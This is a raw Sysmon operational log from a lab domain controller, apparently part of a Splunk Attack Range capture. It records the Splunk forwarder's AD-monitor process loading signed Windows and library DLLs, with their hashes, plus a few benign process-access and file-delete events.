SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100126Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.763{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x8000000000000000100125Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.732{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD216771FA677B5044C1C34C8DD7840B,SHA256=3A5E8A8F13B79CE59630DF0EBAB6F6D1AA1E8B98EFD006916903FF7B3009D6DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100124Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.591{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100123Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.591{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100122Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.591{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100121Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.576{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100120Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.576{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100119Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.576{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100118Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.576{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100117Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.576{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100116Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.576{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000100115Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100114Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100113Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100112Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100111Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100110Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100109Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000100108Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100107Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100106Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100105Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100104Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100103Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000100102Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100101Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x8000000000000000100100Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100099Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100098Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100097Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100096Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100095Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100094Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100093Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100092Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100091Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100090Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100089Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 10341000x8000000000000000100088Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100087Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100086Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100085Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100084Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2trueSplunk, Inc.Valid 10341000x8000000000000000100083Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100082Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 